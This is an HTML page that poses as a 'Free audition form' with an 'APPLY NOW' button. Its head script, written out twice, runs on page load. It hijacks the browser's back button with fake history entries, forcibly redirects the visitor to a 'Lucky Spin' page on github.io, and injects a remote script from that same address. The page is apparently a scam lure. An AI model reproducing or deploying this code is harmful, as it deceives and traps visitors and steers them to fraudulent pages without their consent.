<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Free audition form</title>
    <script>
      window.onhashchange = function () {
        jp();
      };
      function hh() {
        history.pushState(
          history.length + 1,
          "message",
          "#" + new Date().getTime()
        );
      }
      function jp() {
        fh();
      }
      setTimeout("hh();", 500);
      function fh() {
        location.href =
          "https://projectroom119.github.io/Lucky_Spin_local_Arb/";
      }
      function goon() {
        location.href =
          "https://projectroom119.github.io/Lucky_Spin_local_Arb/";
      }

      window.onhashchange = function () {
        jp();
      };
      function hh() {
        history.pushState(
          history.length + 1,
          "message",
          "#" + new Date().getTime()
        );
      }
      function jp() {
        fh();
      }
      setTimeout("hh();", 500);
      function fh() {
        location.href =
          "https://projectroom119.github.io/Lucky_Spin_local_Arb/";
      }
      function goon() {
        location.href =
          "https://projectroom119.github.io/Lucky_Spin_local_Arb/";
      }

      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://projectroom119.github.io/Lucky_Spin_local_Arb/";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
    <style>
      body {
        font-family: Arial, sans-serif;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
        background-color: #f9f9f9;
      }

      .container {
        text-align: center;
      }

      .header {
        font-size: 24px;
        margin-bottom: 20px;
        color: #000;
      }

      .apply-btn {
        background-color: rgb(130, 106, 251);
        color: white;
        padding: 15px 30px;
        font-size: 18px;
        border: none;
        border-radius: 5px;
        cursor: pointer;
        transition: background-color 0.3s ease;
      }

      .apply-btn:hover {
        background-color: black;
      }

      @media (max-width: 600px) {
        .header {
          font-size: 20px;
        }

        .apply-btn {
          padding: 12px 25px;
          font-size: 16px;
        }
      }
    </style>
  </head>
  <body>
    <div class="container">
      <h1 class="header">BEGIN APPLICATION BELOW!</h1>

      <a href="https://projectroom119.github.io/Audition_Form_Local_Arb/">
        <button class="apply-btn">APPLY NOW</button>
      </a>
    </div>
  </body>
</html>
